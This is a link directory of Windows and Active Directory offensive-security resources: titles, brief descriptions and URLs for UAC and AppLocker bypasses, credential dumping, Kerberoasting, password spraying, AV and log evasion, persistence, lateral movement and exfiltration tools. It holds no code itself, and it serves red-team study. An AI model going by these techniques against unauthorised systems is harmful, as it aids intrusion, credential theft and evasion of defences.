Blue Cloud of Death: Red Teaming Azure
https://speakerdeck.com/tweekfawkes/blue-cloud-of-death-red-teaming-azure-1
Ring +3 Malwares: Few tricks
http://www.blackstormsecurity.com/docs/BSIDES_2018_RELEASE.pdf
Kerberos Party Tricks: Weaponizing Kerberos Protocol Flaws
http://www.exumbraops.com/blog/2016/6/1/kerberos-party-tricks-weaponizing-kerberos-protocol-flaws
Executing Commands and Bypassing AppLocker with PowerShell Diagnostic Scripts
https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts
Microsoft's User Account Control feature, introduced in Windows Vista, has been a topic of interest to many in the security community. Since UAC was designed to force user approval for administrative actions, attackers (and red teamers) encounter UAC on nearly every engagement. As a result, bypassing this control is a task that an actor often has to overcome, despite its lack of formal designation as a security boundary. This talk highlights what UAC is, previous work by others, research methodology, and details several technical UAC bypasses developed by the author.
https://youtu.be/c8LgqtATAnE
Windows Userland Persistence Fundamentals
http://www.fuzzysecurity.com/tutorials/19.html
DLL Hijacking via URL files
https://insert-script.blogspot.com.br/2018/05/dll-hijacking-via-url-files.html
DLL Hijacking via URL files
https://insert-script.blogspot.com.br/2018/05/dll-hijacking-via-url-files.html
Enumerating remote access policies through GPO
https://labs.mwrinfosecurity.com/blog/enumerating-remote-access-policies-through-gpo/
https://github.com/dafthack/MailSniper
DomainPasswordSpray
DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain. By default it will automatically generate the userlist from the domain.
https://github.com/dafthack/DomainPasswordSpray
5 Ways to Find Systems Running Domain Admin Processes
5 Ways to Find Systems Running Domain Admin Processes
How to bypass GPO Policy restriction for Powershell usage
https://github.com/p3nt4/PowerShdll
ADAPE - Active Directory Assessment and Privilege Escalation Script
https://github.com/hausec/ADAPE-Script
Kerberoasting, exploiting unpatched systems – a day in the life of a Red Teamer
http://niiconsulting.com/checkmate/2018/05/kerberoasting-exploiting-unpatched-systems-a-day-in-the-life-of-a-red-teamer/
Understanding and Evading Get-InjectedThread
https://blog.xpnsec.com/undersanding-and-evading-get-injectedthread/
PowerLessShell rely on MSBuild.exe to remotely execute PowerShell scripts and commands without spawning powershell.exe. You can also execute raw shellcode using the same approach.
https://github.com/Mr-Un1k0d3r/PowerLessShell
Dumping Clear-Text Credentials
Dumping Clear-Text Credentials
Office365 ActiveSync Username Enumeration
https://www.sec-1.com/blog/2017/office365-activesync-username-enumeration
his script will attempt to list and get TGTs for those users that have the property
'Do not require Kerberos preauthentication' set (UF_DONT_REQUIRE_PREAUTH).
For those users with such configuration, a John The Ripper output will be generated so
you can send it for cracking.
https://github.com/CoreSecurity/impacket/commit/bada8a719f8ed7be4633514eea94bc768dbaf019
NBNS Spoofing
NBNS Spoofing
NTLMv1 Multitool
This tool modifies NTLMv1/NTLMv1-ESS/MSCHAPv2 hashes so they can be cracked with DES Mode 14000 in hashcat
https://github.com/evilmog/ntlmv1-multi/
Invoke-Phant0m
This script walks thread stacks of Event Log Service process (spesific svchost.exe) and identify Event Log Threads to kill Event Log Service Threads. So the system will not be able to collect logs and at the same time the Event Log Service will appear to be running.
https://artofpwn.com/phant0m-killing-windows-event-log.html
https://github.com/hlldz/Invoke-Phant0m
Dumping Active Directory Domain Info – with PowerUpSQL!
Dumping Active Directory Domain Info – with PowerUpSQL!
15 Ways to Bypass the PowerShell Execution Policy
15 Ways to Bypass the PowerShell Execution Policy
Elevate, UAC bypass, persistence, privilege escalation, dll hijack techniques
https://github.com/rootm0s/WinPwnage
Abusing DCOM For Yet Another Lateral Movement Technique
Abusing DCOM For Yet Another Lateral Movement Technique
Invoke-WMILM
This is a PoC script for various methods to acheive authenticated remote code execution via WMI, without (at least directly) using the Win32_Process class. The type of technique is determined by the "Type" parameter.
https://github.com/Cybereason/Invoke-WMILM/blob/master/README.md
[Kernel Exploitation] 7: Arbitrary Overwrite (Win7 x86)
https://www.abatchy.com/2018/01/kernel-exploitation-7
Active Directory as a C2 (Command & Control)
https://akijosberryblog.wordpress.com/2018/03/17/active-directory-as-a-c2-command-control
Bypassing Device Guard with .NET Assembly Compilation Methods
http://www.exploit-monday.com/2017/07/bypassing-device-guard-with-dotnet-methods.html
DiskShadow: The Return of VSS Evasion, Persistence, and Active Directory Database Extraction
https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/
Jumping Network Segregation with RDP
https://rastamouse.me/2017/08/jumping-network-segregation-with-rdp/
PowerShell Shellcode Injection on Win 10 (v1803)
https://blog.cobaltstrike.com/2018/05/24/powershell-shellcode-injection-on-win-10-v1803/
Empire Web v2 Launched, A Web Interface to Powershell empire.
https://github.com/interference-security/empire-web
Hidden Administrative Accounts: BloodHound to the Rescue
https://www.crowdstrike.com/blog/hidden-administrative-accounts-bloodhound-to-the-rescue/
Extracting Service Account Passwords with Kerberoasting
https://blog.stealthbits.com/extracting-service-account-passwords-with-kerberoasting/
MSDAT (Microsoft SQL Database Attacking Tool) is an open source penetration testing tool that tests the security of Microsoft SQL Databases remotely.
https://github.com/quentinhardy/msdat
Powercat
Netcat: The powershell version.
https://github.com/besimorhino/powercat
Windows Privilege Escalation Methods for Pentesters
Windows Privilege Escalation Methods for Pentesters
Getting Domain Admin with Kerberos Unconstrained Delegation
http://www.labofapenetrationtester.com/2016/02/getting-domain-admin-with-kerberos-unconstrained-delegation.html
Scanning for Active Directory Privileges & Privileged Accounts
Scanning for Active Directory Privileges & Privileged Accounts
Automated AD and Windows test lab deployments with Invoke-ADLabDeployer
Automated AD and Windows test lab deployments with Invoke-ADLabDeployer
Simplifying Password Spraying
https://www.trustwave.com/Resources/SpiderLabs-Blog/Simplifying-Password-Spraying/
A Password Spraying tool for Active Directory Credentials
https://github.com/SpiderLabs/Spray
Abusing SeLoadDriverPrivilege for privilege escalation
https://www.tarlogic.com/en/blog/abusing-seloaddriverprivilege-for-privilege-escalation/
Exploring PowerShell AMSI and Logging Evasion
https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
Weaponizing .SettingContent-ms Extensions for Code Execution
https://www.trustedsec.com/2018/06/weaponizing-settingcontent
WMImplant Post-Exploitation – An Introduction
https://www.fortynorthsecurity.com/wmimplant-post-exploitation-an-introduction
WMImplant Post-Exploitation – An Introduction
https://www.fortynorthsecurity.com/wmimplant-post-exploitation-an-introduction
PowerShell: How to get a list of all installed Software on Remote Computers
https://sid-500.com/2018/04/02/powershell-how-to-get-a-list-of-all-installed-software-on-remote-computers
Tokenvator: A Tool to Elevate Privilege using Windows Tokens
Tokenvator: A Tool to Elevate Privilege using Windows Tokens
Disabling AMSI in JScript with One Simple Trick
https://tyranidslair.blogspot.com/2018/06/disabling-amsi-in-jscript-with-one.html
Inveigh is a PowerShell LLMNR/mDNS/NBNS spoofer and man-in-the-middle tool designed to assist penetration testers/red teamers that find themselves limited to a Windows system.
https://github.com/Kevin-Robertson/Inveigh/blob/master/README.md
A multithreaded tool designed to identify if credentials are valid, invalid, or local admin valid credentials within a network at-scale via SMB, plus now with a user hunter
https://github.com/Raikia/CredNinja
PSScriptAnalyzer is a static code checker for Windows PowerShell modules and scripts. PSScriptAnalyzer checks the quality of Windows PowerShell code by running a set of rules. The rules are based on PowerShell best practices identified by PowerShell Team and the community. It generates DiagnosticResults (errors and warnings) to inform users about potential code defects and suggests possible solutions for improvements.
https://github.com/PowerShell/PSScriptAnalyzer
Bypassing SQL Server Logon Trigger Restrictions
Bypassing SQL Server Logon Trigger Restrictions
Spoof SSDP replies to phish for NTLM hashes on a network. Creates a fake UPNP device, tricking users into visiting a malicious phishing page.
https://gitlab.com/initstring/evil-ssdp
https://twitter.com/subTee/status/1012657434702123008?s=19
Incapacitating Windows Defender
Incapacitating Windows Defender
Red Team Tales 0x01: From MSSQL to RCE
https://www.tarlogic.com/en/blog/red-team-tales-0x01
LethalHTA - A new lateral movement technique using DCOM and HTA
https://codewhitesec.blogspot.com/2018/07/lethalhta.html
What is it that Makes a Microsoft Executable a Microsoft Executable? An Attacker’s and a Defender’s Perspective
https://posts.specterops.io/what-is-it-that-makes-a-microsoft-executable-a-microsoft-executable-b43ac612195e
Powershell script to Enumerate executables with auto-elevation enabled, handy for privilege escalation purposes.
https://gist.github.com/Evilcry/71e03a969689b8fd1297a1803aa4d7cf
Using a SCF File to gather Hashes
Using a SCF file to Gather Hashes
A Guide to Attacking Domain Trusts
A Guide to Attacking Domain Trusts
RE: Evading Autoruns PoCs on Windows 10
https://medium.com/@KyleHanslovan/re-evading-autoruns-pocs-on-windows-10-dd810d7e8a3f
Feature, not bug: DNSAdmin to DC compromise in one line
https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83
Beyond LLMNR/NBNS Spoofing – Exploiting Active Directory-Integrated DNS
Beyond LLMNR/NBNS Spoofing – Exploiting Active Directory-Integrated DNS
https://github.com/Kevin-Robertson/Powermad/blob/master/README.md
Domain Access With Write Access on the Domain NC Head
Elevating AD Domain Access With Write Access on the Domain NC Head
Extracting User Password Data with Mimikatz DCSync
https://blog.stealthbits.com/extracting-user-password-data-with-mimikatz-dcsync/
Passing-the-Hash to NTLM Authenticated Web Applications
https://labs.mwrinfosecurity.com/blog/pth-attacks-against-ntlm-authenticated-web-applications/
Application Whitelisting Bypass and Arbitrary Unsigned Code Execution Technique in winrm.vbs
https://posts.specterops.io/application-whitelisting-bypass-and-arbitrary-unsigned-code-execution-technique-in-winrm-vbs-c8c24fb40404
Veil Payloads and Veil-Ordnance
https://www.fortynorthsecurity.com/veil-payloads-and-veil-ordnance/
Clear all your logs in linux/windows servers
https://github.com/Rizer0/Log-killer
Catch me if u can: Bypassing Memory Scanners with Cobalt Strike and Gargoyle
https://labs.mwrinfosecurity.com/blog/experimenting-bypassing-memory-scanners-with-cobalt-strike-and-gargoyle
PowerShell module to check if a Windows binary (EXE/DLL) has been compiled with ASLR, DEP, SafeSEH, StrongNaming, and Authenticode.
https://github.com/NetSPI/PESecurity
Exploiting a Windows 10 PagedPool off-by-one overflow (WCTF 2018)
https://j00ru.vexillium.org/2018/07/exploiting-a-windows-10-pagedpool-off-by-one/
Anonymously Enumerating Azure File Resources
Anonymously Enumerating Azure File Resources
Weaponize PDF with embedding SettingContent-ms inside PDF.
https://github.com/DidierStevens/DidierStevensSuite/blob/master/make-pdf-embedded.py
Persistence using GlobalFlags in Image File Execution Options – Hidden from Autoruns.exe
https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe
Compromising a Azure Windows 2008 R2 SP1 VM
https://guptaashish.com/2018/07/04/compromising-a-azure-windows-2008-r2-sp1-vm
Microsoft LAPS Security & Active Directory LAPS Configuration Recon
Microsoft LAPS Security & Active Directory LAPS Configuration Recon
PowerShell is definitely a "gateway drug" to C# - GhostPack is a collection of new security tools (currently C#), getting rid of the attention that powershell monitoring is getting
https://github.com/GhostPack
Pass the Hash with Kerberos
https://malicious.link/post/2018/pass-the-hash-with-kerberos/
GhostPack
https://posts.specterops.io/ghostpack-d835018c5fc4
Domain Goodness – How I Learned to LOVE AD Explorer
Domain Goodness – How I Learned to LOVE AD Explorer
Another way to get to a system shell – Assistive Technology
Another way to get to a system shell – Assistive Technology
Robber : An open source tool for finding executables prone to DLL hijacking
https://github.com/MojtabaTajik/Robber
safetyKatz: a combination of slightly modified version of @gentilkiwi's Mimikatz project and @subtee's .NET PE Loader.
https://github.com/GhostPack/SafetyKatz
Stored passwords found all over the place after installing Windows in company networks
http://blog.win-fu.com/2017/08/stored-passwords-found-all-over-place.html
Security Fun: Bloodhound, MS16-072 and GPO Discoverability
Security Fun: Bloodhound, MS16-072 and GPO Discoverability
Netsh DLL Helpers
http://liberty-shell.com/sec/2018/07/28/netshlep/
Post Exploitation Using WMIC (System Command)
Post Exploitation Using WMIC (System Command)
Updated PoC Mimikatz Loader for 2018
PoC: https://gist.github.com/caseysmithrc/87f6572547f633f13a8482a0c91fb7b7
One-Liner: https://gist.github.com/xillwillx/96e2c5011577d8583635ad7bf6d4fb58
Notes on Windows Privilege Escalation
http://memorycorruption.org/windows/2018/07/29/Notes-On-Windows-Privilege-Escalation.html
Domain Penetration Testing: Using BloodHound, Crackmapexec, & Mimikatz to get Domain Admin
https://hausec.com/2017/10/21/domain-penetration-testing-using-bloodhound-crackmapexec-mimikatz-to-get-domain-admin
Ultimate AppLocker ByPass List: The goal of this repository is to document the most common techniques to bypass AppLocker.
https://github.com/api0cradle/UltimateAppLockerByPassList/tree/Dev
LDAP Injection Cheat Sheet, Attack Examples & Protection
https://www.checkmarx.com/knowledge/knowledgebase/LDAP
PowerShell script which allows pausing\unpausing Win32/64 exes
https://github.com/besimorhino/Pause-Process
ASP.NET resource files (.RESX) and deserialisation issues
https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/august/aspnet-resource-files-resx-and-deserialisation-issues/
Exploiting XXE Vulnerabilities in IIS/.NET
https://pen-testing.sans.org/blog/2017/12/08/entity-inception-exploiting-iis-net-with-xxe-vulnerabilities
When "ASLR" Is Not Really ASLR - The Case of Incorrect Assumptions and Bad Defaults
https://insights.sei.cmu.edu/cert/2018/08/when-aslr-is-not-really-aslr---the-case-of-incorrect-assumptions-and-bad-defaults.html
Capturing NetNTLM Hashes with Office [DOT] XML Documents
https://bohops.com/2018/08/04/capturing-netntlm-hashes-with-office-dot-xml-documents
pOWershell obFUsCation
pOWershell obFUsCation
Copying Files via WMI and PowerShell
https://www.fortynorthsecurity.com/copying-files-via-wmi-and-powershell
Using WinRM Through Meterpreter
https://www.trustedsec.com/2017/09/using-winrm-meterpreter
TBAL: an (accidental?) DPAPI Backdoor for local users
TBAL: an (accidental?) DPAPI Backdoor for local users
PoC:
https://youtu.be/NIPKMSV-KTw
P0wnedShell:
PowerShell Runspace Post Exploitation Toolkit
https://github.com/Cn33liz/p0wnedShell
mimiDbg:
PowerShell oneliner to retrieve wdigest passwords from the memory
https://github.com/giMini/mimiDbg
Golden Ticket Attack Execution Against AD-Integrated SSO providers
https://www.fractalindustries.com/newsroom/blog/gt-attacks-and-sso
Windows Privilege Escalation Fundamentals
http://www.fuzzysecurity.com/tutorials/16.html
Disabling AMSI in JScript with One Simple Trick
https://tyranidslair.blogspot.com/2018/06/disabling-amsi-in-jscript-with-one.html
Unstoppable Service:
A pattern for a self-installing Windows service in C# with the unstoppable attributes in C#.
https://github.com/malcomvetter/UnstoppableService
Driver loader for bypassing Windows x64 Driver Signature Enforcement
https://github.com/hfiref0x/TDL
Subverting Sysmon:
Application of a Formalized Security Product Evasion Methodology
Code:
https://github.com/mattifestation/BHUSA2018_Sysmon/tree/master/Code
Slides:
https://github.com/mattifestation/BHUSA2018_Sysmon/blob/master/Slides_Subverting_Sysmon.pdf
Whitepaper:
https://github.com/mattifestation/BHUSA2018_Sysmon/blob/master/Whitepaper_Subverting_Sysmon.pdf
An implementation of PSExec in C#
https://github.com/malcomvetter/CSExec
SMBetray: Backdooring and Breaking Signatures
https://quickbreach.io/2018/08/12/smbetray-backdooring-and-breaking-signatures
https://github.com/QuickBreach/SMBetray.git
ADRecon: Active Directory Recon Blackhat Arsenal 2018
https://www.slideshare.net/mobile/prashant3535/adrecon-bh-usa-2018-arsenal-and-def-con-26-demo-labs-presentation
https://github.com/sense-of-security/adrecon
Ps1jacker:
A tool for generating COM Hijacking payload.
https://github.com/darkw1z/Ps1jacker
DEF CON 26 (2018) – Exploiting Active Directory Administrator Insecurities
https://adsecurity.org/wp-content/uploads/2018/08/2018-DEFCON-ExploitingADAdministratorInsecurities-Metcalf.pdf
From Workstation to Domain Admin: Why Secure Administration isn’t Secure and How to Fix it
https://adsecurity.org/wp-content/uploads/2018/08/us-18-Metcalf-From-Workstation-To-Domain-Admin-Why-Secure-Administration-Isnt-Secure-Final.pdf
Tools for instrumenting Windows Defender's mpengine.dll
https://github.com/0xAlexei/WindowsDefenderTools
Art of Anti Detection 1 – Introduction to AV & Detection Techniques
Art of Anti Detection 1 – Introduction to AV & Detection Techniques
Ridrelay: Enumerate usernames on a domain where you have no creds by using SMB Relay with low priv.
https://github.com/skorov/ridrelay
Remotely Enumerate Anti-Virus Configurations
https://www.fortynorthsecurity.com/remotely-enumerate-anti-virus-configurations
Juicy Potato (abusing the golden privileges)
https://decoder.cloud/2018/08/10/juicy-potato
Juicy Potato (abusing the golden privileges)
https://ohpe.github.io/juicy-potato
Hacking around HTA files
http://blog.sevagas.com/?Hacking-around-HTA-files
Koadic C3 COM Command & Control - JScript RAT
https://github.com/zerosum0x0/koadic
Phishing – Ask and ye shall receive
https://blog.fox-it.com/2018/08/14/phishing-ask-and-ye-shall-receive
Windows Exploitation Tricks: Exploiting Arbitrary Object Directory Creation for Local Elevation of Privilege
https://googleprojectzero.blogspot.com/2018/08/windows-exploitation-tricks-exploiting.html
Bypass in Microsoft AD FS Multi-Factor Authentication protocol (CVE-2018-8340):
Multi-Factor Mixup: Who Were You Again?
https://www.okta.com/security-blog/2018/08/multi-factor-authentication-microsoft-adfs-vulnerability
Reconerator: C# Targeted Attack Reconnissance Tools
https://github.com/stufus/reconerator
DCShadow - Minimal permissions, Active Directory Deception, Shadowception and more
http://www.labofapenetrationtester.com/2018/04/dcshadow.html
Skeleton Key Attack
https://pentestlab.blog/2018/04/10/skeleton-key
Arbitrary, Unsigned Code Execution Vector in Microsoft.Workflow.Compiler.exe
https://posts.specterops.io/arbitrary-unsigned-code-execution-vector-in-microsoft-workflow-compiler-exe-3d9294bc5efb
SANS Webcast: PowerShell for PenTesting
https://www.youtube.com/watch?v=a8_DqEVFwO8
Microsoft.Workflow.Compiler.exe Mimikatz Runner.
https://gist.github.com/caseysmithrc/b1190e023cd29c1910c01a164675a22e
List-RDP-Connections-History
Use powershell to list the RDP Connections History of logged-in users or all users
https://github.com/3gstudent/List-RDP-Connections-History
A Universal Windows Bootkit
An analysis of the MBR bootkit referred to as “HDRoot"
http://williamshowalter.com/a-universal-windows-bootkit
Broadcast Name Resolution Poisoning / WPAD Attack Vector
https://p16.praetorian.com/blog/broadcast-name-resolution-poisoning-wpad-attack-vector
.NET Deserialization To NTLM Hashes
https://www.digitalinterruption.com/single-post/2018/04/22/NET-Deserialization-to-NTLM-hashes
Python tool to inject fake updates into unencrypted WSUS traffic
https://github.com/pdjstone/wsuspect-proxy
Remotely Modify Anti-Virus Configurations
https://www.fortynorthsecurity.com/remotely-modify-anti-virus-configurations
Making The Perfect Injector: Abusing Windows Address Sanitization And CoW
Making the Perfect Injector: Abusing Windows Address Sanitization and CoW
Leaking Environment Variables in Windows Explorer via .URL or desktop.ini files
https://insert-script.blogspot.com/2018/08/leaking-environment-variables-in_20.html
Extracting SSH Private Keys from Windows 10 ssh-agent
https://blog.ropnop.com/extracting-ssh-private-keys-from-windows-10-ssh-agent
Top Five Ways I Got Domain Admin on Your Internal Network before Lunch (2018 Edition)
https://medium.com/@adam.toscher/top-five-ways-i-got-domain-admin-on-your-internal-network-before-lunch-2018-edition-82259ab73aaa
CVE-2018-0952: Privilege Escalation Vulnerability in Windows Standard Collector Service
https://www.atredis.com/blog/cve-2018-0952-privilege-escalation-vulnerability-in-windows-standard-collector-service
Operational Guidance for Offensive User DPAPI Abuse
https://posts.specterops.io/operational-guidance-for-offensive-user-dpapi-abuse-1fb7fac8b107
Kerberoasting and SharpRoast output parsing!
https://grumpy-sec.blogspot.com/2018/08/kerberoasting-and-sharproast-output.html
whitelist_bypass_server
This module is designed to be a platform to test an endpoints application whitelisting effectiveness by providing bypasses to solutions such as software restriction policies and applocker.
https://github.com/rapid7/metasploit-framework/pull/8783
Clientside Exploitation - Tricks of the Trade 0x01 - Sharpshooter + SquibblyTwo
https://0x00sec.org/t/clientside-exploitation-tricks-of-the-trade-0x01-sharpshooter-squibblytwo/8178
Privilege Escalation & Post-Exploitation Docs
https://rmusser.net/docs/Privilege Escalation & Post-Exploitation.html
Task Scheduler ALPC exploit (unpatched) && PoC by SandboxEscaper
https://github.com/SandboxEscaper/randomrepo/blob/master/PoC-LPE.rar
Remote NTLM relaying through meterpreter on Windows port 445
https://diablohorn.com/2018/08/25/remote-ntlm-relaying-through-meterpreter-on-windows-port-445
Microsoft.Workflow.Compiler.exe, Veil, and Cobalt Strike
https://www.fortynorthsecurity.com/microsoft-workflow-compiler-exe-veil-and-cobalt-strike
Bypassing Workflows Protection Mechanisms - Remote Code Execution on SharePoint
https://www.nccgroup.trust/uk/our-research/technical-advisory-bypassing-workflows-protection-mechanisms-remote-code-execution-on-sharepoint
Having Fun with ActiveX Controls in Microsoft Word
https://www.blackhillsinfosec.com/having-fun-with-activex-controls-in-microsoft-word
Invoke-AtomicTest - Automating MITRE ATT&CK with Atomic Red Team
http://subt0x11.blogspot.com/2018/08/invoke-atomictest-automating-mitre-att.html
AppLocker Bypass - CMSTP
https://pentestlab.blog/2018/05/10/applocker-bypass-cmstp
Persistence using AdminSDHolder and SDProp
https://blog.stealthbits.com/persistence-using-adminsdholder-and-sdprop
Red Teaming Microsoft: Part 1 – Active Directory Leaks via Azure
https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure
Walk-through Mimikatz sekurlsa module
https://jetsecurity.github.io/post/mimikatz/walk-through_sekurlsa
windows-privesc-check - Standalone Executable to Check for Simple Privilege Escalation Vectors on Windows Systems
https://github.com/pentestmonkey/windows-privesc-check
Understanding how DLL Hijacking works
https://astr0baby.wordpress.com/2018/09/08/understanding-how-dll-hijacking-works
Playing with Relayed Credentials
https://www.coresecurity.com/blog/playing-relayed-credentials
DDE Downloaders, Excel Abuse, and a PowerShell Backdoor
http://rinseandrepeatanalysis.blogspot.com/2018/09/dde-downloaders-excel-abuse-and.html
A detailed technical explanation of CVE-2018-8120
https://xiaodaozhi.com/exploit/156.html
A PowerShell example of the Windows zero day priv esc
https://github.com/OneLogicalMyth/zeroday-powershell/blob/master/README.md
You can't contain me! :: Analyzing and Exploiting an Elevation of Privilege Vulnerability in Docker for Windows
https://srcincite.io/blog/2018/08/31/you-cant-contain-me-analyzing-and-exploiting-an-elevation-of-privilege-in-docker-for-windows.html
CVE-2018-8420 - Microsoft XML Core Services MSXML RCE through web browser PoC
https://github.com/Theropord/CVE-2018-8420
Bypassing AppLocker Custom Rules
https://0x09al.github.io/security/applocker/bypass/custom/rules/windows/2018/09/13/applocker-custom-rules-bypass.html
0x09AL Security blog
Bypassing AppLocker Custom Rules
Introduction
Jonhnathan Jonhnathan Jonhnathan
w0rk3r's Windows Hacking Library
Exploiting STOPzilla AntiMalware Arbitrary Write Vulnerability using SeCreateTokenPrivilege
Exploiting STOPzilla AntiMalware Arbitrary Write Vulnerability using SeCreateTokenPrivilege
Jonhnathan Jonhnathan Jonhnathan
w0rk3r's Windows Hacking Library
How to add a module in Mimikatz?
https://littlesecurityprince.com/security/2018/03/18/ModuleMimikatz.html
Multiple Ways to Bypass UAC using Metasploit
Multiple Ways to Bypass UAC using Metasploit
Jonhnathan Jonhnathan Jonhnathan
w0rk3r's Windows Hacking Library
From OSINT to Internal: Gaining Domain Admin from Outside the Perimeter
https://www.coalfire.com/The-Coalfire-Blog/Sept-2018/From-OSINT-to-Internal-Gaining-Domain-Admin
Using Mimikatz From a JSP shell
https://blog.securitycompass.com/whiteboard-wednesday-using-mimikatz-from-a-jsp-shell-54f8a21693cc
Poking Around With 2 lsass Protection Options
https://medium.com/red-teaming-with-a-blue-team-mentaility/poking-around-with-2-lsass-protection-options-880590a72b1a
Introducing SharpSploit: A C# Post-Exploitation Library
https://posts.specterops.io/introducing-sharpsploit-a-c-post-exploitation-library-5c7be5f16c51
Faster Domain Escalation using LDAP
Faster Domain Escalation using LDAP
A Lesson in .NET Framework Versions
https://rastamouse.me/2018/09/a-lesson-in-.net-framework-versions
Command and Control Using Active Directory
Command and Control Using Active Directory
L1TF (Foreshadow) VM guest to host memory read PoC
https://github.com/gregvish/l1tf-poc
SMB hash hijacking & user tracking in MS Outlook
https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/may/smb-hash-hijacking-and-user-tracking-in-ms-outlook
SharpBox is a C# tool for compressing, encrypting, and exfiltrating data to DropBox using the DropBox API
https://github.com/P1CKLES/SharpBox
From Kekeo to Rubeus
https://posts.specterops.io/from-kekeo-to-rubeus-86d2ec501c14
Tokenvator: Release 2
Tokenvator: Release 2
AppLocker CLM Bypass via COM
https://www.mdsec.co.uk/2018/09/applocker-clm-bypass-via-com
Injdrv is a proof-of-concept Windows Driver for injecting DLL into user-mode processes using APC
https://github.com/wbenny/injdrv
Responder and Layer 2 Pivots
https://ijustwannared.team/2017/05/27/responder-and-layer-2-pivots
PowerShell: Documenting your environment by running systeminfo on all Domain-Computers
https://sid-500.com/2017/08/09/powershell-documenting-your-environment-by-running-systeminfo-on-all-domain-computers
The power of backup operators
https://decoder.cloud/2018/02/12/the-power-of-backup-operatos
Abusing Windows Library Files for Persistence
https://www.countercept.com/blog/abusing-windows-library-files-for-persistence
Domain Controlller Print Server + Unconstrained Kerberos Delegation = Pwned Active Directory Forest
Domain Controller Print Server + Unconstrained Kerberos Delegation = Pwned Active Directory Forest
invoke-Confusion .NET attacker of Powershell Remotely
https://homjxi0e.wordpress.com/2018/10/02/invoke-confusion-attack-of-powershell
Creating Persistence with DCShadow
https://blog.stealthbits.com/creating-persistence-with-dcshadow
Time Travel Debugging: finding Windows GDI flaws
Time Travel Debugging: finding Windows GDI flaws
Malicious use of Microsoft “Local Administrator Password Solution”
http://archive.hack.lu/2017/HackLU_2017_Malicious_use_LAPS_Clementz_Goichot.pdf
Tokenvator Wiki
https://github.com/0xbadjuju/Tokenvator/wiki
ServiceFu: Harvesting Service Account Credentials Remotely
https://www.securifera.com/blog/2018/10/07/servicefu
Operating Offensively Against Sysmon
https://www.darkoperator.com/blog/2018/10/5/operating-offensively-against-sysmon
Exploiting Regedit: Invisible Persistence & Binary Storage
https://github.com/ewhitehats/InvisiblePersistence/blob/master/InvisibleRegValues_Whitepaper.pdf
PoC:
https://github.com/ewhitehats/InvisiblePersistence/tree/master/InvisibleKeys
Attacking Azure Environments with PowerShell
https://youtu.be/IdORwgxDpkw
MicroBurst: A collection of scripts for assessing Microsoft Azure security
https://github.com/NetSPI/MicroBurst
Icebreaker.py: Gaining a foothold in Active Directory in one command
Dan McInerney at SaintCon
https://youtu.be/1LR5u8uKO8I
[Tool] Icebreaker:
Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment
https://github.com/DanMcInerney/icebreaker
Leveraging WSUS – Part One
https://ijustwannared.team/2018/10/15/leveraging-wsus-part-one
Powershell Payload Delivery via DNS using Invoke-PowerCloud
https://how.ired.team/offensive-security-experiments/payload-delivery-via-dns-using-invoke-powercloud
SharpAttack: A console for certain tasks on security assessments. It leverages .NET and the Windows API to perform its work( and cobbr_io SharpSploit). It contains commands for domain enumeration, code execution, and other fun things.
https://github.com/jaredhaight/SharpAttack
Living Off the Land
https://liberty-shell.com/sec/2018/10/20/living-off-the-land